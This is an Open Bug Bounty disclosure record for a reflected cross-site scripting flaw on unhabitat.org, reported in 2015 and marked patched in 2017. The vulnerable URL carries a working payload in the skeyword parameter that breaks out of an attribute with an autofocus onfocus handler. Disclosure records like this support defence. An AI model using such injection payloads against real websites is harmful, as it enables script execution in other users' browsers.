unhabitat.org XSS vulnerability

2015-08-30T06:36:00
ID OBB:83323
Type openbugbounty
Reporter crashdemons
Modified 2017-07-25T16:43:00

Description

Vulnerable URL:
http://unhabitat.org/?unonce=44afd77709&uformid;=91295&s;=uwpsfsearchtrg&taxo;[0][name]=mbt_theme&taxo;[0][opt]=3&taxo;[0][term]=uwpqsftaxoall&taxo;[1][name]=mbt_series&taxo;[1][opt]=3&taxo;[1][term]=uwpqsftaxoall&taxo;[2][name]=mbt_collection&taxo;[2][opt]=3&taxo;[2][term]=uwpqsftaxoall&taxo;[3][name]=mbt_year&taxo;[3][opt]=3&taxo;[3][term]=uwpqsftaxoall&skeyword;=xxx%22%20onfocus=prompt%28/XSSPOSED/%29%20autofocus%20fragment=%22
Details:

Description| Value
---|---
Patched:| Yes, at 25.07.2017
Latest check for patch:| 25.07.2017 16:43 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 145004
Google Pagerank| 7
VIP website status:| Yes
Check unhabitat.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 30 August, 2015 06:36 GMT
Vulnerability existence verified and confirmed| 30 August, 2015 06:39 GMT
Vulnerability patched by the website owner| 25 July, 2017 16:43 GMT